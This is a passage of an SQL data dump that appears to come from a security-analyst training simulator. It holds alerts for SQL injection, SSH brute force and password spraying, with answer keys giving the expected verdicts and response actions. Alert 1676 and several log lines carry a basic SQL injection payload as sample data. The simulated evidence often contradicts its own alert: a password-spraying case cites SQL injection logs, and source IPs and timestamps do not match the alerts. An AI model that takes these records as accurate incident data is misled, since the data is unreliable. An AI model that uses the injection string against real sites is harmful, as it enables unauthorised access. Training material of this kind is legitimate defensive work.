3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T21:40:10Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.77\\\",\\\"dst_ip\\\":\\\"192.168.1.75\\\",\\\"username\\\":\\\"test\\\",\\\"hostname\\\":\\\"web-auth\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.948Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T21:40:10Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.77\\\",\\\"dst_ip\\\":\\\"192.168.1.75\\\",\\\"username\\\":\\\"test\\\",\\\"hostname\\\":\\\"web-auth\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1676, 'SQL Injection Attempt Detected on Public-Facing Web Server', 'critical', 'Splunk', 'SQL injection attempt detected in a web request targeting a public-facing web server.', 'Web Attack', 'T1190', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T22:50:00Z\",\"event_type\":\"web_request\",\"src_ip\":\"192.0.2.60\",\"dst_ip\":\"10.0.0.80\",\"username\":\"none\",\"hostname\":\"public-web\",\"request_body\":\"\' OR \'1\'=\'1\' --\",\"command_line\":\"\"}', '2026-03-15 19:39:26', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.0.2.60\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in SQL injection attempts\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.80\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_3\",\"type\":\"payload\",\"value\":\"\' OR \'1\'=\'1\' --\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"SQL injection attempt detected\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The malicious payload and IP reputation confirm the SQL injection attempt.\"}', 'Beginner', 'SIEM', 3, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.950Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T22:50:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.0.2.60\\\",\\\"dst_ip\\\":\\\"10.0.0.80\\\",\\\"username\\\":\\\"none\\\",\\\"hostname\\\":\\\"public-web\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.950Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T22:50:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.0.2.60\\\",\\\"dst_ip\\\":\\\"10.0.0.80\\\",\\\"username\\\":\\\"none\\\",\\\"hostname\\\":\\\"public-web\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.950Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T22:50:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.0.2.60\\\",\\\"dst_ip\\\":\\\"10.0.0.80\\\",\\\"username\\\":\\\"none\\\",\\\"hostname\\\":\\\"public-web\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.950Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T22:50:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.0.2.60\\\",\\\"dst_ip\\\":\\\"10.0.0.80\\\",\\\"username\\\":\\\"none\\\",\\\"hostname\\\":\\\"public-web\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.950Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T22:50:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.0.2.60\\\",\\\"dst_ip\\\":\\\"10.0.0.80\\\",\\\"username\\\":\\\"none\\\",\\\"hostname\\\":\\\"public-web\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\",\\\"command_line\\\":\\\"\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | head 100\"}}', 0),
(1677, 'Brute Force Attempt from Internal IP', 'low', 'Azure Sentinel', 'Detected several failed SSH login attempts from an internal IP address, possibly due to misconfigured scripts.', 'Brute Force', 'T1110', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T23:15:20Z\",\"event_type\":\"login_failure\",\"src_ip\":\"192.168.1.100\",\"dst_ip\":\"10.0.0.90\",\"username\":\"root\",\"hostname\":\"internal-server\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-03-15 19:39:26', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address, likely misconfigured script\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.90\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"root\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Commonly targeted username\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The internal source and lack of malicious intent suggest a false positive due to misconfiguration.\"}', 'Beginner', 'SIEM', 3, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.952Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T23:15:20Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"dst_ip\\\":\\\"10.0.0.90\\\",\\\"username\\\":\\\"root\\\",\\\"hostname\\\":\\\"internal-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.952Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T23:15:20Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"dst_ip\\\":\\\"10.0.0.90\\\",\\\"username\\\":\\\"root\\\",\\\"hostname\\\":\\\"internal-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.952Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T23:15:20Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"dst_ip\\\":\\\"10.0.0.90\\\",\\\"username\\\":\\\"root\\\",\\\"hostname\\\":\\\"internal-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.952Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T23:15:20Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"dst_ip\\\":\\\"10.0.0.90\\\",\\\"username\\\":\\\"root\\\",\\\"hostname\\\":\\\"internal-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.952Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T23:15:20Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"dst_ip\\\":\\\"10.0.0.90\\\",\\\"username\\\":\\\"root\\\",\\\"hostname\\\":\\\"internal-server\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1678, 'Password Spraying Attack Detected on Web Portal', 'critical', 'Splunk', 'Detected a password spraying attack against the internal web portal with multiple failed login attempts from an external IP.', 'Credential Attack', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T03:56:12Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.10\",\"username\":\"jdoe\",\"hostname\":\"web-portal\",\"failed_attempts\":25}', '2026-03-15 19:40:23', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal username involved in attack\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The external IP has been flagged for malicious activity, confirming the attack.\"}', 'Beginner', 'SIEM', 3, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.953Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T03:56:12Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"web-portal\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-03-15T20:57:15.953Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T03:56:12Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"web-portal\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-03-15T20:56:15.953Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T03:56:12Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"web-portal\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-03-15T20:55:15.953Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T03:56:12Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"web-portal\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-03-15T20:54:15.953Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T03:56:12Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"web-portal\\\",\\\"failed_attempts\\\":25}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | head 100\"}}', 0),
(1679, 'SSH Brute Force Spike Detected', 'high', 'Wazuh', 'A spike in SSH login attempts was detected, indicating a potential brute force attack on the server.', 'Brute Force', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T05:10:34Z\",\"event_type\":\"login_failure\",\"src_ip\":\"198.51.100.33\",\"dst_ip\":\"10.0.0.5\",\"username\":\"admin\",\"hostname\":\"ssh-server\",\"failed_attempts\":42}', '2026-03-15 19:40:23', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.33\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in numerous brute force attempts\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Common administrative username\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The high number of failed attempts from a known malicious IP confirms the brute force attack.\"}', 'Beginner', 'SIEM', 3, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.954Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T05:10:34Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.33\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"ssh-server\\\",\\\"failed_attempts\\\":42}\"},{\"timestamp\":\"2026-03-15T20:57:15.954Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T05:10:34Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.33\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"ssh-server\\\",\\\"failed_attempts\\\":42}\"},{\"timestamp\":\"2026-03-15T20:56:15.954Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T05:10:34Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.33\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"ssh-server\\\",\\\"failed_attempts\\\":42}\"},{\"timestamp\":\"2026-03-15T20:55:15.954Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T05:10:34Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.33\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"ssh-server\\\",\\\"failed_attempts\\\":42}\"},{\"timestamp\":\"2026-03-15T20:54:15.954Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T05:10:34Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.33\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"ssh-server\\\",\\\"failed_attempts\\\":42}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1680, 'False Positive: Internal SSH Activity', 'low', 'Elastic SIEM', 'Detected SSH login attempts from an internal IP address, likely due to a scheduled script.', 'Brute Force', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T06:22:48Z\",\"event_type\":\"login_success\",\"src_ip\":\"192.168.0.15\",\"dst_ip\":\"192.168.0.20\",\"username\":\"backup_user\",\"hostname\":\"backup-server\",\"failed_attempts\":2}', '2026-03-15 19:40:23', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address used for scheduled tasks\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"backup_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal user for backup operations\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The activity is consistent with internal maintenance operations.\"}', 'Beginner', 'SIEM', 3, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.956Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T06:22:48Z\\\",\\\"event_type\\\":\\\"login_success\\\",\\\"src_ip\\\":\\\"192.168.0.15\\\",\\\"dst_ip\\\":\\\"192.168.0.20\\\",\\\"username\\\":\\\"backup_user\\\",\\\"hostname\\\":\\\"backup-server\\\",\\\"failed_attempts\\\":2}\"},{\"timestamp\":\"2026-03-15T20:57:15.956Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T06:22:48Z\\\",\\\"event_type\\\":\\\"login_success\\\",\\\"src_ip\\\":\\\"192.168.0.15\\\",\\\"dst_ip\\\":\\\"192.168.0.20\\\",\\\"username\\\":\\\"backup_user\\\",\\\"hostname\\\":\\\"backup-server\\\",\\\"failed_attempts\\\":2}\"},{\"timestamp\":\"2026-03-15T20:56:15.956Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T06:22:48Z\\\",\\\"event_type\\\":\\\"login_success\\\",\\\"src_ip\\\":\\\"192.168.0.15\\\",\\\"dst_ip\\\":\\\"192.168.0.20\\\",\\\"username\\\":\\\"backup_user\\\",\\\"hostname\\\":\\\"backup-server\\\",\\\"failed_attempts\\\":2}\"},{\"timestamp\":\"2026-03-15T20:55:15.956Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T06:22:48Z\\\",\\\"event_type\\\":\\\"login_success\\\",\\\"src_ip\\\":\\\"192.168.0.15\\\",\\\"dst_ip\\\":\\\"192.168.0.20\\\",\\\"username\\\":\\\"backup_user\\\",\\\"hostname\\\":\\\"backup-server\\\",\\\"failed_attempts\\\":2}\"},{\"timestamp\":\"2026-03-15T20:54:15.956Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T06:22:48Z\\\",\\\"event_type\\\":\\\"login_success\\\",\\\"src_ip\\\":\\\"192.168.0.15\\\",\\\"dst_ip\\\":\\\"192.168.0.20\\\",\\\"username\\\":\\\"backup_user\\\",\\\"hostname\\\":\\\"backup-server\\\",\\\"failed_attempts\\\":2}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1681, 'Password Spraying Attempt on Internal Network', 'medium', 'Azure Sentinel', 'Multiple failed login attempts detected from an external IP, suggesting a password spraying attempt.', 'Credential Attack', 'T1110', 1, 'investigating', NULL, '{\"timestamp\":\"2026-03-15T08:45:30Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.88\",\"dst_ip\":\"10.0.0.9\",\"username\":\"smith\",\"hostname\":\"internal-webapp\",\"failed_attempts\":30}', '2026-03-15 19:40:23', '2026-03-15 21:17:05', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.88\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple password spraying reports\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"smith\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"User involved in the detected attack\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The external IP\'s malicious history confirms its involvement in the attack.\"}', 'Beginner', 'SIEM', 3, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.960Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T08:45:30Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.88\\\",\\\"dst_ip\\\":\\\"10.0.0.9\\\",\\\"username\\\":\\\"smith\\\",\\\"hostname\\\":\\\"internal-webapp\\\",\\\"failed_attempts\\\":30}\"},{\"timestamp\":\"2026-03-15T20:57:15.960Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T08:45:30Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.88\\\",\\\"dst_ip\\\":\\\"10.0.0.9\\\",\\\"username\\\":\\\"smith\\\",\\\"hostname\\\":\\\"internal-webapp\\\",\\\"failed_attempts\\\":30}\"},{\"timestamp\":\"2026-03-15T20:56:15.960Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T08:45:30Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.88\\\",\\\"dst_ip\\\":\\\"10.0.0.9\\\",\\\"username\\\":\\\"smith\\\",\\\"hostname\\\":\\\"internal-webapp\\\",\\\"failed_attempts\\\":30}\"},{\"timestamp\":\"2026-03-15T20:55:15.960Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T08:45:30Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.88\\\",\\\"dst_ip\\\":\\\"10.0.0.9\\\",\\\"username\\\":\\\"smith\\\",\\\"hostname\\\":\\\"internal-webapp\\\",\\\"failed_attempts\\\":30}\"},{\"timestamp\":\"2026-03-15T20:54:15.960Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T08:45:30Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.88\\\",\\\"dst_ip\\\":\\\"10.0.0.9\\\",\\\"username\\\":\\\"smith\\\",\\\"hostname\\\":\\\"internal-webapp\\\",\\\"failed_attempts\\\":30}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
